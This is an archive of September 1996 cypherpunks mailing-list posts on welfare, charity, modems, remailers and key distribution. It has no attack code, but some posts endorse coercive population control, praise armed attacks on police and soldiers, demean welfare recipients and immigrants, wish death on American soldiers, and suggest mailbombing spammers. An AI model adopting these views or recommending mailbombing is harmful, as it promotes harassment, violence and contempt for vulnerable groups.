do anything in a tyrannical state, and bribery to bribe tyrants to create starving children for photo ops. It is very common for international charities to develop excessively friendly relationships with murderous tyrannies, Monsters do not generally sport horns and a tail. More commonly they walk around on two legs with large neon halos prominently displayed. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From shamrock at netcom.com Sun Sep 15 23:59:04 1996 From: shamrock at netcom.com (Lucky Green) Date: Mon, 16 Sep 1996 14:59:04 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: <323C9BC1.2160@gte.net> Message-ID: On Sun, 15 Sep 1996, Dale Thorn wrote: > Just a comment: "The world population really should go back to around > one billion", etc. And how could we achieve that without severe govt. > oppression, one wonders? Now, I've heard of "education" being used to > help the masses learn to be responsible citizens ad nauseam, but since > education is pretty much just propaganda in the massively-capitalist > system now taking over even the P.R. of China, how the heck is education > going to work? Quite simple. End all food and medical aid to developing countries paid for with money stolen at gunpoint from our citizens. Or make Norplant implants the condition for financial/in kind aid. Both US and abroad. --Lucky From jimbell at pacifier.com Mon Sep 16 00:02:33 1996 From: jimbell at pacifier.com (jim bell) Date: Mon, 16 Sep 1996 15:02:33 +0800 Subject: ComLaw> Down South Message-ID: <199609160436.VAA09109@mail.pacifier.com> Cross-post from commonlaw at teleport.com At 09:11 PM 9/15/96 -0400, James M. Cobb wrote: > 09 14 96 Associated Press distributes a newsstory headed: > > MEXICAN REBELS WARN OF MORE 'SELF-DEFENSE' ATTACKS > AGAINST GOVERNMENT > Points from the newsstory: > Leaders of a violent new rebel group are vowing to > press their war on Mexico's military and police.... > > [Last month's] raids were the most widespread guerril- > la attacks in Mexico in decades. > > ...during the news conference, the rebel leaders... > said that...bomb threats issued since last month's at- > tacks were part of an outside campaign to discredit the > group. > > They said their targets will continue to be government, > not civilian, sites. > Please note that word: OUTSIDE. > > Imported from Atlanta. > "Overnight" via NAFTA Express: > [The rebel group's statement] cited "the TERROR and > desperation caused by unemployment, the drastic reduc- > tion of the buying power of salaries, the lack of at- > tention to health, education and housing." > Cordially, > Jim > NOTE. The AP newsstory's www.nando.net online filename: > > world2_15734.html > I capitalized the Clinton-word in the last quota- > tion. > This critical essay was composed 09 15 96. >From what has appeared in the American media about this new Mexican rebel group, I'm particularly pleased with them. This is exactly the kind of alternative that we need to the stereotypical, "kill lotsa innocent citizens" attacks which are often associated with the term terrorism. They make it clear that they specifically target soldiers, police, and other government employees. After reading a couple of articles, it is obvious what they need: A method to prevent spoofing of their communiques, a function that PGP could do quite easily. Jim Bell jimbell at pacifier.com From nobody at replay.com Mon Sep 16 00:54:28 1996 From: nobody at replay.com (Anonymous) Date: Mon, 16 Sep 1996 15:54:28 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: Message-ID: <199609160537.HAA26159@basement.replay.com> Tim May wrote: > The thing about _traditional_ charity, of the religious or community sort, > was that it was not treated as an "entitlement," as something the resentful > masses could "demand" as part of their "human rights." There's no substantial difference between their resentful whining about their rights and your resentful whining about your rights - except maybe that you whine more. From craigw at dg.ce.com.au Mon Sep 16 01:02:04 1996 From: craigw at dg.ce.com.au (craigw at dg.ce.com.au) Date: Mon, 16 Sep 1996 16:02:04 +0800 Subject: 56 kbps modems Message-ID: <199609160033.KAA29614@mac.ce.com.au> well here in Australia Telstra our national carrier only "garantees" 2400 baud to work. I live within 2km of the exchange and the best I have ever achieved was 22k/sec over the lines (usually about 18k). This is not what the modem tells you it is doing....but what you get as a result of testing the ACTUAL modem speed using a line analizer program. What a modem manufacturer says you get and what the line gives you are Totaly separate. > People who seemed to know used to say that 'the Shannon limit' >set an absolute upper limit around 40 kbps. Has Shannon been >proven wrong, or what? ,'~``. \|/ ,'``~. (-o=o-) (@ @) ,(-o=o-), +--.oooO--(_)--Ooo-----oOO-(_)-OOo-------oooO--(_)--Oooo.------+ | | | Soon, we may all be staring at our computers, wondering | | whether they're staring back. | | | | [Network Admin For WPA Business Products. aka doshai >;-) ] | | .oooO http://pip.com.au/~doshai/ Oooo. | | ( ) Oooo. .oooO ( ) | +-----\ (----( )-------oooO-Oooo--------( )--- ) /---------+ \_) ) / \ ( (_/ (_/ \_) Key fingerprint = 2D F4 54 BB B4 EA F1 E7 B6 DE 48 92 FC 8D FF 49 Send a message with the subject "send pgp-key" for a copy of my key. (if I want to give it to you) From attila at primenet.com Mon Sep 16 01:13:48 1996 From: attila at primenet.com (attila) Date: Mon, 16 Sep 1996 16:13:48 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: Message-ID: <199609160537.XAA22337@InfoWest.COM> In , on 09/15/96 at 11:17 AM, tcmay at got.net (Timothy C. May) said: = .At 11:43 PM 9/15/96, attila wrote: = .> NO, it does not need to be or do either, BUT, it means = .> that everybody independently attempts to succeed and = .> the 'community' takes care of itself --and in the = .> standardsense, the ne'er do wells fall off the path = .> of *their own free choice.* There will always be = .> sickness and calamity, but that is what the community = .> is for. = .> = .> BTW, it still works today; I live in one of 'em. = .And lest there be any doubt, I _do_ support certain kinds of = .charities, and will not of course stop anyone from practicing = .charity. While I have no religious beliefs to speak of, OK, Tim, we're patient... we do not convert, we accept among the Saints only those who have received their own testimony. each must be free to pray as they believe. = .I strongly = .support the mechanisms some churches have for taking care of their = .own members, recruits from the street, etc. our members are our community. we believe in self-determination and that each must achieve is own greatness. we also believe in the support of the community, one and all. we do not file for government welfare. = .(Including Salvation = .Army and "mission" sorts of inner city things--note of course that = .most such entities also insist on prayer and/or Bible readings as = .part of the deal... well, we pray before our meals; we just ask that you respect our preference to pray. we do not ask you to listen; if you listen, that is for your benefit; The Salvation Army does make the men/women suffer through a short lesson and prayer. maybe just one will listen one day; that is their reward. The Salvation Army is just that: a dedicated army for the fallen. Their "commanders" live in the same general quarters. = .I wonder how long it will be before a class = .action lawsuit is filed to stop the prayer part? This would = .effectively shut the missions down, of course.) I doubt it would shut the Salvation Army down; that is a life long commitment and saving souls may be a mission, but not the raison d'etre of their existence. The rest of them, I suspect the loss of 'mission' might be a death knell. = .The thing about _traditional_ charity, of the religious or = .community sort, was that it was not treated as an "entitlement," as = .something the resentful masses could "demand" as part of their = ."human rights." THAT is the difference. not until FDR was there an entitlement. = .A parish priest, for example, might extend charity = .to a poor person, or a widow, or whatever, but not to an = .able-bodied person who simply decided to not work. = . that was the 'poor box' at the front of the sanctuary; the stories of the widow's mite (that and the teachings of Christ receiving the widow's mite). = .Nor to an = .unmarried woman who kept getting pregnant and having more mouths to = .feed. well, stoning has not gone out of vogue in the muslim countries. = .(I surmise that most such women either died of diseases related to = .sexual promiscuity, died in childbirth, died of disease brought on = .by malnutrition, or ended up in convents (Catholic birth control).) slave labour comes to mind... = .The point is that even in an "age of charity," strings have to be = .attached by the givers of charity. People will simply not give = .40-60% of what they earn to support a growing population of people = .who say it's their "right" to welfare, AFDC (Aid to Families with = .Dependent Children), WIC (Women, Infants, and Children), food = .stamps (*), and suchlike. = . well, so far we are, by extortion, in what is labeled as the "worlds largest voluntary tax system" the problem is that the "entitlemented" are allowed to vote, and they outnumber us. but heaven forbid that the liberal media should permit us to disenfranchise or decimate their cadres. = .(At certain supermarkets I sometimes shop in on the way back to my = .town, people in front of me in line put their nice cuts of meat = .down, their fine loaves of bread, their frozen dinner entrees, = .their "Ben and Jerry's Ice Cream," and then pay for it with books = .of blue "Department of Agriculture" food stamps. =. I made a sarcastic comment some month's ago to a companion as we viewed such a scene in a large supermarket (I sing bass or contrabass, and it carries). the ensuing ruckus degenerated to a small group of the incensed illegals warily looking at the man in black, black assassins lid, mirrored aviators.... intimidation is just another form of communication... = .They use their own = .cash (perhaps gotten by cashing their welfare and "disability" = .checks) to buy their smokes and booze, as food stamps are not = .allowed to be spent on this stuff. My impression is that they eat = .more expensive food than I do, they do, Tim, they do. --and more of it; the fruits of your labour! = .perhaps because they're buying the = .food with "play money," whereas I'm buying my food with money = .that's what's left after I had to pay 40-50 taxes, so I seek to = .economize when I can!) they can't add a checkbook or read to pass a driver's license, but they can count entitlement money. that's all right; after the Federal law killing the require- ment for alternative languages, you speak and write English to get a driver's license in Utah, or anything else. learn or burn. = .> Now, I don't intend to be Scrooge, but I'll fight for = .> my rights to cut off at the knees the knee-jerk = .> liberals and government slavemeisters who want to tell = .> me that I, and 2 others are required to support 100 = .> freeloaders. = .And speaking of Scrooge, I like "A Christmas Carol" about as much = .as anyone I know, and try to take the lesson of what Scrooge = .learned as a general lesson about life and living it. In Dickensonian (I guess it works) England, the employer was ethically charged with the care of his employees. Of course, this all fits into my concept: "in general, men are basically good --unless it involves money." Unfortunately, very few monied industrialists were charitable, and this fact gave FDR the opportunity to start the interminable dole, generation after generation of welfare _entitlements_. the lazy, the pregnant teenagers on their third child, &c. believe they are _entitled_ to pick my pocket, and your pocket. at this point < 20% of the population is supporting > 80% who are _entitled_ to my support because some bleeding heart knee jerk says so. the federal budget defines these programs as _entitlements_ --they have even dropped the pretense of calling it "aid" or "welfare." It is a separate budget class by itself and does not figure in the stated deficit. and the slimeball Clinton brought in for the Treasury, he already replaced the entitlement funds with a government IOU... Scrooge needed to receive the revelation of charity --and to accept the principle. He did. Charity is not a Christian concept; it is fundamental human characteristic present to some extent in most humans, and differentiates us from say the ants, who cannibalize their fallen comrads. I know many good, charitable individuals who are not religious, even agnostics. I've always discounted atheism as a conundrum; you can not deny before you first identify. = .(As with "Robin Hood," the message is often confused. Robin Hood = .was not "stealing from the rich," he was taking back what was = .stolen from the peasants and farmers by the King and his tax = .collectors, notably the Sheriff of Notingham. At least this is how = .I read the myth.) you bet! the Sheriff of Nottingham was _greedy_ and merciless. Robin Hood was only returning the property to the rightful owners --a lesson missed by most. the real question: just how much of a myth is it? the moral would not have been stated and the peasants would not have protected the "merry band" had they been plunderers of the land. = .--Tim May Oh, yes, I forgot to add a special message to "Dr. Dimitri" on his Piled higher [and] Deeper throne of cow feces, don't forget to address me as "Dr. Attila" 'cause I got a couple of them things, too. and if Tim is an old fart, what am I? I've got at least 5-10 years on Tim. --doesn't keep my hand off the cranked throttle of my 102 cu in outlaw chopper. --attila -- one of the few things we all share: the utter, corrosive contempt for our elected officials. From stewarts at ix.netcom.com Mon Sep 16 01:25:50 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 16 Sep 1996 16:25:50 +0800 Subject: SPL -- Suspicious Persons List Message-ID: <199609160558.WAA11070@dfw-ix6.ix.netcom.com> At 09:04 PM 9/15/96 -0400, Phill wrote: >> Work for the competition, or start your own company. >Easy enough for you or me who can charge the minimum wage rate >for an hour for a period more like a minute. In this part of California, most yard work is done by small companies run by guys named Jose or Pablo, who can charge maybe 2-3x minimum at most before the competition undercuts them. And they have to worry about blacklists also - "business licenses" and "immigration papers". >... >Being opposed to government slavery isn't enough. Coorporate slavery >is just as bad. Unless people are enfranchised ecconmically as >well as politically the political liberties don't matter much. It's not corporate slavery when you don't have to work for them. >I am on an SPL that is run by an organisation called the "Ecconomic >League". It is an organisation run by the UK Conservative party >which keeps lists of "unsafe" employees. Of course the list is (Just because I don't believe in the concept of "corporate slavery" doesn't mean I don't think corporations can be offensive. This sucks...) Out of curiousity, I thought the UK had Data Privacy Laws or some sort of Database Cops - does that not apply to applications like this? # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From tcmay at got.net Mon Sep 16 01:32:41 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 16 Sep 1996 16:32:41 +0800 Subject: "But if it saves just one child." Message-ID: At 3:51 PM 9/15/96, James A. Donald wrote: ... >Not everyone who sends food to the starving children is ultra >respectable. > >Problem is that the usual cause of starving children is tyranny. ... >It is very common for international charities to develop excessively >friendly relationships with murderous tyrannies, But there is a simple rationale for this behavior... The rallying cry heard so often these days: "But if it saves just one child." Hence the moves to ban guns, the moves to ban cigarettes, the moves to remove violent scenes from movies, books, and video games, and, yes, the close alliances between Save Our Children and the Idi Amins of the world. (Hillary also thinks it takes a village to save the children.) --Tim May, who think GAK and Position Escrow are justified if they save but one child's life. We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From mccoy at communities.com Mon Sep 16 01:45:46 1996 From: mccoy at communities.com (Jim McCoy) Date: Mon, 16 Sep 1996 16:45:46 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: Message-ID: Anonymous wrote: >Tim May wrote: > >> The thing about _traditional_ charity, of the religious or community sort, >> was that it was not treated as an "entitlement," as something the resentful >> masses could "demand" as part of their "human rights." > > There's no substantial difference between their resentful whining about >their rights and your resentful whining about your rights - except maybe >that you whine more. Actually there is a fundemental difference: what Tim demands is the right to be left alone and to be free from exernal influence as long as what he is doing does not directly hurt another, what "they" demand is to be taken care of by others because they either cannot or choose not to take care of themselves. The latter requires that someone productive (like Tim) be forced to take care of them through taxation or otherwise at gunpoint. In most societies this is considered the difference between a child and an adult... jim From shamrock at netcom.com Mon Sep 16 01:47:34 1996 From: shamrock at netcom.com (Lucky Green) Date: Mon, 16 Sep 1996 16:47:34 +0800 Subject: 56 kbps modems In-Reply-To: <199609160033.KAA29614@mac.ce.com.au> Message-ID: On Mon, 16 Sep 1996 craigw at dg.ce.com.au wrote: > well here in Australia Telstra our national carrier only "garantees" > 2400 baud to work. I live within 2km of the exchange and the best I > have ever achieved was 22k/sec over the lines (usually about 18k). > This is not what the modem tells you it is doing....but what you get > as a result of testing the ACTUAL modem speed using a line analizer > program. What a modem manufacturer says you get and what the line > gives you are Totaly separate. Seriously, how may of the 28.8 modem users get connections at 28.8? Twenty percent? Fifty percent? Today's modems are already faster than most analog lines can support. More likely than not, a 56k modem won't link up at 56k. If you want speed, use the clean solution. Get ISDN. [And don't buy the Motorola BitSurfer PRO. It won't work with two line phones. The sound is so bad, you can't use the POTS you pull out for business. Motorola: "We are aware of the problem". Well, they have been aware of it since at least February.] But for data, home ISDN is the way to go. --Lucky From attila at primenet.com Mon Sep 16 02:04:11 1996 From: attila at primenet.com (attila) Date: Mon, 16 Sep 1996 17:04:11 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: <199609160537.HAA26159@basement.replay.com> Message-ID: <199609160641.AAA23324@InfoWest.COM> In <199609160537.HAA26159 at basement.replay.com>, on 09/16/96 at 07:37 AM, nobody at replay.com (Anonymous) said: = .Tim May wrote: = .> The thing about _traditional_ charity, of the religious or community sort, = .> was that it was not treated as an "entitlement," as something the resentful = .> masses could "demand" as part of their "human rights." = . There's no substantial difference between their resentful whining about = .their rights and your resentful whining about your rights - except maybe = .that you whine more. that is worse than a cheap shot... like a man low enough to shoot another while he's taking a crap. I'm not whining about it my rights any more than Tim is whining about his. One of the principals of the American Revolution was NO TAXATION WITHOUT REPRESENTATION. When our government takes my money and creates a new class which "votes" to require me to pay for them; they are a vested interest voting only for their own gain without my consent. human rights are supposedly universal. however, since when has an entitlement been considered a "human right?" are you playing the part of the bleeding knee-jerk welfare advocate? The type: "I'm willing to give mine, (but I cheat on my taxes) --just make sure you let the Feds extort their welfare system from _your_ profits. The welfare system is not only broken and bankrupt, it is a SELF EATING WATERMELON. charity is man's _benevolence_ and, there is nothing in the scriptures which says the lazy and resentful are _entitled_ to my support. I tithe, and tithe faithfully; and contribute a fast offering every month for the ward bishop's fund. as in says in the scriptures, he who faithfully tithes shall receive it tenfold. we take care of our own community, and we don't collect welfare. it works. and for the paid hypocritics who pass the basket every Sunday and scream about the poor --they dont give, they want you to give. --attila From attila at primenet.com Mon Sep 16 02:24:23 1996 From: attila at primenet.com (attila) Date: Mon, 16 Sep 1996 17:24:23 +0800 Subject: "But if it saves just one child." In-Reply-To: Message-ID: <199609160656.AAA23532@InfoWest.COM> In , on 09/15/96 at 03:51 PM, tcmay at got.net (Timothy C. May) said: = .The rallying cry heard so often these days: "But if it saves just one child." = . "...now that we have saved just one child, save another, a boy and a girl, so they breed,and we can justify our jobs feeding: "just one more child...." "...give until you bleed." = .(Hillary also thinks it takes a village to save the children.) yeah, a _global_ village with good King Hillary. welcome to "Logan's Run" (and Fahrenheit 451) From peter at baileynm.com Mon Sep 16 04:06:58 1996 From: peter at baileynm.com (Peter da Silva) Date: Mon, 16 Sep 1996 19:06:58 +0800 Subject: Email Robot draws fire from CypherPunkz In-Reply-To: Message-ID: <9609152004.AA09655@sonic.nmti.com.nmti.com> Sneck. The points I get out of this: 1. Cypherpunks lives up to its name. Mainly, the second part. 2. Whether an email spam is business related or not, it's neither desirable or interesting. Two years ago having a robot like that might have been amusing. Now it's just another spam. 3. Y'all really oughta read Stand on Zanzibar again. I think you're missing the point. From an401dws at gold.ac.uk Mon Sep 16 05:40:22 1996 From: an401dws at gold.ac.uk (Doug) Date: Mon, 16 Sep 1996 20:40:22 +0800 Subject: New Remailers? Message-ID: <1604.9609160953@gold.ac.uk> OK dont shoot me, im new to this list so please Bear with me: I recently secured an account with anon.penet and then a few days later got a post informing me that the servive was now terminated. Anybody out there know of any remailers where you dont have to have a Phd in computer science and a thorough working knowledge of PGP in order to operate? Also, are there any remailers which will accept binary attachments? doug From gary at systemics.com Mon Sep 16 05:49:48 1996 From: gary at systemics.com (Gary Howland) Date: Mon, 16 Sep 1996 20:49:48 +0800 Subject: 56 kbps modems In-Reply-To: <199609160033.KAA29614@mac.ce.com.au> Message-ID: <323D28E8.15FB7483@systemics.com> craigw at dg.ce.com.au wrote: > > well here in Australia Telstra our national carrier only "garantees" > 2400 baud to work. As I am sure has been discussed at length before, baud does not equal bps. AFAIK, V32bis is only 2400baud. Gary -- "Of course the US Constitution isn't perfect; but it's a lot better than what we have now." -- Unknown. pub 1024/C001D00D 1996/01/22 Gary Howland Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06 From jonathan at dcs.gla.ac.uk Mon Sep 16 05:59:31 1996 From: jonathan at dcs.gla.ac.uk (jonathan) Date: Mon, 16 Sep 1996 20:59:31 +0800 Subject: (Long) RFC: Public Key Finger: A preliminary proposal for a distributed key publishing system In-Reply-To: <199609151909.MAA10901@toad.com> Message-ID: On Sun, 15 Sep 1996, Geoff Dale wrote: > The original (html) document may be obtained at: > > http://www.fqa.com/geoff/pkf.htm > > --------------------------------------------------------------------------- > Version 0.2, Draft > > Public Key Finger > > (aka the People's Key Front) > > A preliminary proposal for a distributed key publishing system > > --------------------------------------------------------------------------- [snip] is that the Judean People's Key Front, or the People's Key Front of Judea? :-j (old british joke, for the monty-python impaired...) -- Jonathan AH Hogg, Computing Science, The University, Glasgow G12 8RZ, Scotland. jonathan at dcs.gla.ac.uk http://www.dcs.gla.ac.uk/~jonathan (+44)141 3398855x2069 From dthorn at gte.net Mon Sep 16 06:20:07 1996 From: dthorn at gte.net (Dale Thorn) Date: Mon, 16 Sep 1996 21:20:07 +0800 Subject: [Noise] Shopkeepers Preventing Riot Redistribution In-Reply-To: Message-ID: <323D0FAA.330E@gte.net> Lucky Green wrote: > On Sun, 15 Sep 1996, Jim Ray wrote: > Indeed it was. In a beautiful-to-me scene which Miami's WSVN Channel 7 > (our big-hair station) called "chilling," Korean-American shopkeepers, > perched atop their building with semi-automatic firearms, kept one > block safe while the rest of the neighborhood burned without police > protection. > Upon being informed that this was a biased interpretation of > legitimate actions by the merchants, which _I_ found heartwarming, > they said that chilling was "just a word." > What your TV station probably didn't report was that the police > quickly showed up at the scene. To arrest the looters carrying > crowbars and torches? Of course not. The cops came to arrest the > "sniper". --Lucky This fascinating aspect of law enforcement described above is something you can test for yourself: Probably whatever state of the U.S. you (might) live in issues you a driver's license, to obtain which you read a booklet and pass a test. Get your booklet and read everything your state mandates about defensive driving, particularly in maintaining a minimum safe distance from other vehicles, given current velocities. Now try to practice that safety on your state freeways. You will: 1. Be severly harrassed, threatened, and possibly injured or killed (more-or-less deliberately) by another driver who feels it's his/her right (incorrectly of course) to mount your car anally, rather than simply go around. 2. Be harrassed by the state police for "obstructing traffic" (even though the other driver initiated the problem, illegally), because after all, the state police are told (subliminally, I guess) not to protect you, but rather to keep traffic moving, which is "good for business". 3. Be charged as the party at fault when another driver runs into the back of your car, even when you are travelling in a straight line, within five MPH of the speed limit, and the freeway is practically empty. Needless to say, such a charge is not hard to turn around if you're smart and know how to write stinging letters to the insurance company, if not the state govt. It's just interesting as hell to see the police follow a different book than their (presumed) bosses, the state govt. Common reason would suggest that the police would view a true defensive driver as a "troublemaker" (some sort of anarchist, perhaps?), and want to get that driver back into "normal" driving mode, or off the road completely. I mention this because you can't normally test police attitudes with the gun-firing approach, but you can with a car. If my instincts prove correct, however, few people who read this post will see the reason in it, being in the majority of aggressive neurotic drivers (just a guess). From paul at fatmans.demon.co.uk Mon Sep 16 06:27:47 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Mon, 16 Sep 1996 21:27:47 +0800 Subject: "Remailers can't afford to be choosy" Message-ID: <842781738.23305.0@fatmans.demon.co.uk> > > Umm.... freedom of the press is freedom for he who owns the press. > >The remailer operators own the presses; why shouldn't they use whatever means > >they see fit to determine how they can be used? I encourage people not to > >discriminate on the basis of the political orientation of what's going > >through... but spam isn't political speech. (I agree that the government > >should not be in the business of determining what is spam and what is > >political speech - all speech should be protected - but remailer operators > >are not governments.) The point here, I think, that we are failing to see is that the remailers are run on private machines and bandwidth, when you use a remailer you are a guest on someone else property, your mail is using their bandwidth etc. They can determine how they like how they are used, I just hope most of us will have the strength of conscience to refrain from using remailers which censor or restrict their throughput, I agree that spam is a different question but we do have our own way of dealing with this, just mailbomb the senders, if they are commercial they are likely to leave an address or telephone number on the spam even if the email address is anonymized, we have ways ;-) Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3ia mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/ 9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90 En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2 YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi mUqFH41Z7NkyO8ZFdi5GGX0= =CMZA -----END PGP PUBLIC KEY BLOCK----- From perry at alpha.jpunix.com Mon Sep 16 07:07:33 1996 From: perry at alpha.jpunix.com (John Perry) Date: Mon, 16 Sep 1996 22:07:33 +0800 Subject: New type2.list/pubring.mix Message-ID: <199609161103.GAA09054@alpha.jpunix.com> A non-text attachment was scrubbed... Name: not available Type: application/pgp Size: 14 bytes Desc: not available URL: From dlv at bwalk.dm.com Mon Sep 16 08:41:44 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Mon, 16 Sep 1996 23:41:44 +0800 Subject: China joins Singapore, Germany, .... In-Reply-To: <842781740.23307.0@fatmans.demon.co.uk> Message-ID: >From paul at fatmans.demon.co.uk Mon Sep 16 04:22:40 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Mon, 16 Sep 96 07:19:49 EDT for dlv Received: from relay-4.mail.demon.net by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA11172 for dlv at bwalk.dm.com; Mon, 16 Sep 96 04:22:40 -0400 Received: from post.demon.co.uk ([(null)]) by relay-4.mail.demon.net id ak07550; 15 Sep 96 13:11 GMT Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net id aa23307; 15 Sep 96 11:02 BST Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP id AA842732056 ; Sat, 14 Sep 96 20:14:16 +0000 Comments: Authenticated sender is From: paul at fatmans.demon.co.uk To: "Dr.Dimitri Vulis KOTM" Date: Sat, 14 Sep 1996 20:14:14 +0000 Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7BIT Subject: Re: China joins Singapore, Germany, .... Priority: normal X-Mailer: Pegasus Mail for Windows (v2.31) Message-Id: <842781740.23307.0 at fatmans.demon.co.uk> > > Nazi POWs were Nazis and deserved to be killed. Likewise, American soldiers > are murderous scum. I wish Saddam Hussein the best of luck in killing every > American he can get. > > P.S. Please do not cc: me. Fuck you. Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3ia mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/ 9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90 En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2 YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi mUqFH41Z7NkyO8ZFdi5GGX0= =CMZA -----END PGP PUBLIC KEY BLOCK----- From dlv at bwalk.dm.com Mon Sep 16 08:47:21 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Mon, 16 Sep 1996 23:47:21 +0800 Subject: Internet Drivers' Licenses In-Reply-To: <842781757.23377.0@fatmans.demon.co.uk> Message-ID: <86kcuD66w165w@bwalk.dm.com> >From paul at fatmans.demon.co.uk Mon Sep 16 04:17:55 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Mon, 16 Sep 96 07:19:56 EDT for dlv Received: from relay-4.mail.demon.net by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA10926 for dlv at bwalk.dm.com; Mon, 16 Sep 96 04:17:55 -0400 Received: from post.demon.co.uk ([(null)]) by relay-4.mail.demon.net id ak19657; 15 Sep 96 11:16 GMT Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net id aa23377; 15 Sep 96 11:02 BST Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP id AA842732060 ; Sat, 14 Sep 96 20:14:20 +0000 Comments: Authenticated sender is From: paul at fatmans.demon.co.uk To: "Dr.Dimitri Vulis KOTM" Date: Sat, 14 Sep 1996 20:14:14 +0000 Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7BIT Subject: Re: Internet Drivers' Licenses Priority: normal X-Mailer: Pegasus Mail for Windows (v2.31) Message-Id: <842781757.23377.0 at fatmans.demon.co.uk> > This is the kind of project cypherpunks would do if they were writing code, > instead of lies and personal attacks, the way Tim May (fart) does. Is a Tim May reference compulsory in all of your postings you stupid little man? Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3ia mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 